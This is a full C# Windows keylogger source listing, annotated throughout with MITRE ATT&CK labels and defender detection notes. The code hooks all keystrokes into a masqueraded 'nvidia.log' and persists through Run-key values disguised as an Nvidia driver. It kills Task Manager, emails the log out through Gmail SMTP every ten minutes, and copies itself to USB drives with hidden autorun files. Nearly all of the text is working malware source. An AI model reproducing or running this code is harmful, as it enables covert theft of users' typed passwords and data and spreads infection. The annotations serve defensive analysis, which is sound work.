  // Constants, shared state and Win32 imports for a program that captures keystrokes through
  // a global low-level keyboard hook (MITRE ATT&CK T1056.001, Input Capture: Keylogging).
  // Host artifact declared here: the capture file "nvidia.log" in the roaming AppData folder,
  // a vendor-like name that does not identify the program writing it (T1036, Masquerading).
  1. private const int WH_KEYBOARD_LL = 13; // hook type passed to SetWindowsHookEx in SetHook
  2. private const int WM_KEYDOWN = 0x0100; // HookCallback only processes this message
  3. private static LowLevelKeyboardProc _proc = HookCallback; // delegate handed to SetHook in Main
  4. private static IntPtr _hookID = IntPtr.Zero; // hook handle: assigned in Main, used by CallNextHookEx and UnhookWindowsHookEx
  // Full path of the keystroke log: <roaming AppData>\nvidia.log. HookCallback appends to it,
  // OnTimedEvent attaches it to an e-mail and truncates it after a successful send.
  5. public static string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"nvidia.log");
  // caps / shift: modifier state used by HookCallback (0 = off, 1 = on).
  // failed: outcome of the last mail send in OnTimedEvent (0 = sent, 1 = send threw).
  6. public static byte caps = 0, shift = 0, failed = 0;
  7.  
  // user32!SetWindowsHookEx: installs a hook procedure; called once, from SetHook.
  8. [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  9. private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
  10.  
  // user32!UnhookWindowsHookEx: removes the hook; called at the end of Main.
  11. [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  12. [return: MarshalAs(UnmanagedType.Bool)]
  13. private static extern bool UnhookWindowsHookEx(IntPtr hhk);
  14.  
  // user32!CallNextHookEx: passes the event on to the next hook; called from HookCallback.
  15. [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  16. private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
  17.  
  // kernel32!GetModuleHandle: used by SetHook to obtain the handle of the process's main module.
  18. [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  19. private static extern IntPtr GetModuleHandle(string lpModuleName);
  20.  
  // Entry point. Order of operations as written:
  //   1. install the low-level keyboard hook (SetHook),
  //   2. run startup(), which copies the executable and touches the Run registry keys,
  //   3. start a repeating 600000 ms (10 minute) timer that calls OnTimedEvent,
  //   4. start a repeating 10000 ms (10 second) timer that calls USBSpread,
  //   5. enter a message loop with Application.Run() (no form is passed).
  // Detection note: a process that installs WH_KEYBOARD_LL and then sits in a message loop
  // without passing any form is a behaviour worth alerting on; the two timer periods give
  // the file, network and removable-drive activity of this sample a regular cadence.
  21. public static void Main()
  22. {
  23. _hookID = SetHook(_proc);
  24. Program.startup();
  25. System.Timers.Timer timer;
  26. timer = new System.Timers.Timer();
  27. timer.Elapsed += new ElapsedEventHandler(Program.OnTimedEvent);
  28. timer.AutoReset = true;
  29. timer.Interval = 600000;
  30. timer.Start();
  31. System.Timers.Timer timer2;
  32. timer2 = new System.Timers.Timer();
  33. timer2.Elapsed += new ElapsedEventHandler(Program.USBSpread);
  34. timer2.AutoReset = true;
  35. timer2.Interval = 10000;
  36. timer2.Start();
  37. Application.Run();
  // Reached only after the message loop ends: keep both timers referenced up to this point,
  // then remove the keyboard hook.
  38. GC.KeepAlive(timer);
  39. GC.KeepAlive(timer2);
  40. UnhookWindowsHookEx(_hookID);
  41. }
  42.  
  // Persistence routine (MITRE ATT&CK T1547.001, Registry Run Keys; T1036, Masquerading).
  // It copies the running executable to <roaming AppData>\nvdisp.exe and then works with a
  // value named "Nvidia driver" under SOFTWARE\Microsoft\Windows\CurrentVersion\Run in both
  // HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE. Every step sits in its own try block whose
  // bare catch only prints a console message, so no failure is reported to the caller.
  // Indicators a defender can hunt for, all taken from this listing:
  //   - file   <roaming AppData>\nvdisp.exe
  //   - value  "Nvidia driver" in the HKCU / HKLM Run keys, pointing into a user profile
  // A Run value with a driver-like name whose data is an executable under AppData is a
  // strong signal on its own: vendor drivers are not started from a user's profile.
  43. public static void startup()
  44. {
  45. // Copy the running executable into the roaming AppData folder as nvdisp.exe
  46. string source = Application.ExecutablePath.ToString();
  47. string destination = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
  48. destination=System.IO.Path.Combine(destination,"nvdisp.exe");
  49. try
  50. {
  // overwrite is false, so File.Copy throws when nvdisp.exe already exists; in that case
  // source keeps the path the program was started from.
  51. System.IO.File.Copy(source, destination,false);
  52. source = destination;
  53. } catch {
  54. Console.WriteLine("No authorization to copy file or other error.");
  55. }
  56. // Per-user Run key: look for the "Nvidia driver" value and set it to destination if absent
  57. try
  58. {
  59. RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);
  60.  
  61. if (registryKey.GetValue("Nvidia driver") == null)
  62. {
  63. registryKey.SetValue("Nvidia driver", destination);
  64. }
  65.  
  66. registryKey.Close();//dispose of the Key
  67. } catch {
  68. Console.WriteLine("Error setting startup reg key.");
  69. }
  70. // Machine-wide Run key: same value name, but the data is source rather than destination
  71. try
  72. {
  73. RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);
  74.  
  75. if (registryKey.GetValue("Nvidia driver") == null)
  76. {
  77. registryKey.SetValue("Nvidia driver", source);
  78. }
  79.  
  80. registryKey.Close();//dispose of the key
  81. }
  82. catch
  83. {
  84. Console.WriteLine("Error setting startup reg key for all users.");
  85. }
  86. }
  87.  
  // Timer callback, wired in Main to fire every 600000 ms. Two things happen per tick:
  //   1. every process whose MainWindowTitle contains the text "Taskmgr.exe" is killed;
  //   2. the keystroke log at Program.path is attached to an e-mail and sent through
  //      smtp.gmail.com on port 587 with SSL enabled (MITRE ATT&CK T1048, Exfiltration Over
  //      Alternative Protocol). If Send does not throw, the log file is emptied.
  // The account name and password are string literals in the binary (placeholders on this
  // page). In a recovered sample such literals are evidence: they identify the drop mailbox
  // and can be handed to the mail provider for takedown.
  // Detection notes: SMTP submission traffic to a public mail provider from a workstation
  // process that is not a mail client, repeating on a ten-minute period, and a log file that
  // shrinks to zero bytes right after each connection.
  88. public static void OnTimedEvent(object source, EventArgs e)
  89. {
  90. Process[] ProcessList = Process.GetProcesses();
  91. foreach (Process proc in ProcessList)
  92. {
  93. if (proc.MainWindowTitle.Contains("Taskmgr.exe"))
  94. {
  95. proc.Kill();
  96. }
  97. }
  98. System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
  // Sender and recipient are the same mailbox.
  99. msg.To.Add("username@gmail.com");
  100. msg.From = new MailAddress("username@gmail.com", "username", System.Text.Encoding.UTF8);
  101. msg.Subject = "i don't know";
  102. msg.SubjectEncoding = System.Text.Encoding.UTF8;
  103. msg.Body = "ciao ale";
  104. msg.BodyEncoding = System.Text.Encoding.UTF8;
  105. msg.IsBodyHtml = false;
  106. msg.Priority = MailPriority.High;
  107. SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
  108. client.Credentials = new System.Net.NetworkCredential("username@gmail.com", "password");
  109. client.Port = 587;
  110. client.Host = "smtp.gmail.com";
  111. client.EnableSsl = true;
  // The captured keystrokes leave the host as a file attachment, not in the message body.
  112. Attachment data = new Attachment(Program.path);
  113. msg.Attachments.Add(data);
  114. try
  115. {
  116. client.Send(msg);
  117. failed = 0;
  118. }
  119. catch
  120. {
  // Any send error is swallowed; only the failed flag records it.
  121. data.Dispose();
  122. failed = 1;
  123. }
  124. data.Dispose();
  125.  
  // The log is truncated only after a send that did not throw, so captured data
  // accumulates on disk while the host has no route to the mail server.
  126. if (failed == 0)
  127. File.WriteAllText(Program.path, ""); //empties the file
  128.  
  129. failed = 0;
  130.  
  131. }
  132.  
  // Installs proc as a WH_KEYBOARD_LL hook and returns the hook handle from SetWindowsHookEx.
  // The module handle passed is that of the current process's main module, and the thread id
  // is 0. The Process and ProcessModule objects are disposed when the using blocks exit.
  // Detection note: this single SetWindowsHookEx call with idHook 13 is the API event that
  // EDR and API-monitoring tools key on for keyboard capture (MITRE ATT&CK T1056.001).
  133. private static IntPtr SetHook(LowLevelKeyboardProc proc)
  134. {
  135. using (Process curProcess = Process.GetCurrentProcess())
  136. using (ProcessModule curModule = curProcess.MainModule)
  137. {
  138. return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
  139. }
  140. }
  // Delegate type with the callback signature that SetHook hands to SetWindowsHookEx.
  141. private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
  // Hook procedure. For every key-down message (nCode >= 0 and wParam == WM_KEYDOWN) it
  // appends a text rendering of the key to the log at Program.path. It then always calls
  // CallNextHookEx, so the keystroke still reaches the rest of the hook chain.
  // State handling: Program.shift is set when Control.ModifierKeys equals Keys.Shift and is
  // cleared after each key; Program.caps is toggled each time Keys.Capital is seen.
  // Detection note: the log is opened, appended to and closed once per key press, which
  // appears in file-system telemetry as a stream of very small appends to one file in the
  // roaming AppData folder while the user types.
  142. private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
  143. {
  144. if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
  145. {
  146. StreamWriter sw = File.AppendText(Program.path);
  // For WH_KEYBOARD_LL, lParam points to a KBDLLHOOKSTRUCT whose first field is the
  // virtual-key code; only that 32-bit field is read here.
  147. int vkCode = Marshal.ReadInt32(lParam);
  148. if (Keys.Shift == Control.ModifierKeys) Program.shift = 1;
  149.  
  150. switch ((Keys)vkCode)
  151. {
  // Whitespace and editing keys: Space and Return are written as real whitespace,
  // Back and Tab as the literal words "back" and "TAB".
  152. case Keys.Space:
  153. sw.Write(" ");
  154. break;
  155. case Keys.Return:
  156. sw.WriteLine("");
  157. break;
  158. case Keys.Back:
  159. sw.Write("back");
  160. break;
  161. case Keys.Tab:
  162. sw.Write("TAB");
  163. break;
  // Digit row: the digit when shift is 0, otherwise the symbol hard-coded for that key.
  164. case Keys.D0:
  165. if (Program.shift == 0) sw.Write("0");
  166. else sw.Write(")");
  167. break;
  168. case Keys.D1:
  169. if (Program.shift == 0) sw.Write("1");
  170. else sw.Write("!");
  171. break;
  172. case Keys.D2:
  173. if (Program.shift == 0) sw.Write("2");
  174. else sw.Write("@");
  175. break;
  176. case Keys.D3:
  177. if (Program.shift == 0) sw.Write("3");
  178. else sw.Write("#");
  179. break;
  180. case Keys.D4:
  181. if (Program.shift == 0) sw.Write("4");
  182. else sw.Write("$");
  183. break;
  184. case Keys.D5:
  185. if (Program.shift == 0) sw.Write("5");
  186. else sw.Write("%");
  187. break;
  188. case Keys.D6:
  189. if (Program.shift == 0) sw.Write("6");
  190. else sw.Write("^");
  191. break;
  192. case Keys.D7:
  193. if (Program.shift == 0) sw.Write("7");
  194. else sw.Write("&");
  195. break;
  196. case Keys.D8:
  197. if (Program.shift == 0) sw.Write("8");
  198. else sw.Write("*");
  199. break;
  200. case Keys.D9:
  201. if (Program.shift == 0) sw.Write("9");
  202. else sw.Write("(");
  203. break;
  // Modifier and menu keys on their own add nothing to the log (an empty string is written).
  204. case Keys.LShiftKey:
  205. case Keys.RShiftKey:
  206. case Keys.LControlKey:
  207. case Keys.RControlKey:
  208. case Keys.LMenu:
  209. case Keys.RMenu:
  210. case Keys.LWin:
  211. case Keys.RWin:
  212. case Keys.Apps:
  213. sw.Write("");
  214. break;
  // Punctuation keys: unshifted / shifted characters are hard-coded per key.
  215. case Keys.OemQuestion:
  216. if (Program.shift == 0) sw.Write("/");
  217. else sw.Write("?");
  218. break;
  219. case Keys.OemOpenBrackets:
  220. if (Program.shift == 0) sw.Write("[");
  221. else sw.Write("{");
  222. break;
  223. case Keys.OemCloseBrackets:
  224. if (Program.shift == 0) sw.Write("]");
  225. else sw.Write("}");
  226. break;
  227. case Keys.Oem1:
  228. if (Program.shift == 0) sw.Write(";");
  229. else sw.Write(":");
  230. break;
  231. case Keys.Oem7:
  232. if (Program.shift == 0) sw.Write("'");
  233. else sw.Write('"');
  234. break;
  235. case Keys.Oemcomma:
  236. if (Program.shift == 0) sw.Write(",");
  237. else sw.Write("<");
  238. break;
  239. case Keys.OemPeriod:
  240. if (Program.shift == 0) sw.Write(".");
  241. else sw.Write(">");
  242. break;
  243. case Keys.OemMinus:
  244. if (Program.shift == 0) sw.Write("-");
  245. else sw.Write("_");
  246. break;
  247. case Keys.Oemplus:
  248. if (Program.shift == 0) sw.Write("=");
  249. else sw.Write("+");
  250. break;
  251. case Keys.Oemtilde:
  252. if (Program.shift == 0) sw.Write("`");
  253. else sw.Write("~");
  254. break;
  255. case Keys.Oem5:
  256. sw.Write("|");
  257. break;
  // Caps Lock is tracked as a toggle in Program.caps and is not written to the log.
  258. case Keys.Capital:
  259. if (Program.caps == 0) Program.caps = 1;
  260. else Program.caps = 0;
  261. break;
  // Every other key: the Keys enum name is written, upper-cased when exactly one of
  // shift and caps is set, lower-cased otherwise.
  262. default:
  263. if (Program.shift == 0 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToLower());
  264. if (Program.shift == 1 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToUpper());
  265. if (Program.shift == 0 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToUpper());
  266. if (Program.shift == 1 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToLower());
  267. break;
  268. }
  269. Program.shift = 0;
  270. sw.Close();
  271. }
  272. return CallNextHookEx(_hookID, nCode, wParam, lParam);
  273. }
  274.  
  // Timer callback, wired in Main to fire every 10000 ms (MITRE ATT&CK T1091, Replication
  // Through Removable Media; T1564.001, Hidden Files and Directories).
  // For each drive whose DriveType is Removable it writes an autorun.inf at the drive root
  // ("open=start.exe", "action=Run VMCLite"), marks it Hidden, copies the running executable
  // to the drive root as start.exe (overwriting any existing file) and marks that Hidden too.
  // Indicators a defender can hunt for, all taken from this listing:
  //   - hidden autorun.inf plus hidden start.exe at the root of a removable volume
  //   - the action string "Run VMCLite" inside autorun.inf
  //   - the same files being rewritten every ten seconds while a drive is attached
  // Mitigation: keep AutoRun disabled for removable media by policy (NoDriveTypeAutoRun) and
  // block or alert on executables launched from removable-volume roots.
  275. public static void USBSpread(object source, EventArgs e)
  276. {
  277. ///////////////////////////////////////////////////////////////
  278. /////////////////////// USB spread class //////////////////////
  279. ///////////////////////////////////////////////////////////////
  280. //A bit modified
  281. string source2 = Application.ExecutablePath.ToString();
  282. System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives();
  283. try
  284. {
  285. foreach (System.IO.DriveInfo drive in drives)
  286. {
  287. if (drive.DriveType == DriveType.Removable)
  288. {
  289. string driveAutorun = drive.Name + "autorun.inf";
  290. StreamWriter sw = new StreamWriter(driveAutorun);
  291. sw.WriteLine("[autorun]\n");
  292. sw.WriteLine("open=start.exe");
  293. sw.WriteLine("action=Run VMCLite");
  294. sw.Close();
  295. File.SetAttributes(drive.Name + "autorun.inf", File.GetAttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden);
  296. try
  297. {
  298. File.Copy(source2, drive.Name + "start.exe", true);
  299. File.SetAttributes(drive.Name + "start.exe", File.GetAttributes(drive.Name + "start.exe") | FileAttributes.Hidden);
  300. }
  301. finally
  302. {
  // The finally block runs whether or not the copy above threw.
  303. Console.WriteLine("Removable device rooted");
  304. }
  305. }
  306. }
  307. }
  308. catch (Exception e2)
  309. {
  // Any exception from the drive loop ends this tick; the text is printed to the console.
  310. Console.WriteLine(e2.ToString());
  311. }
  312. }
  313. }
  314. }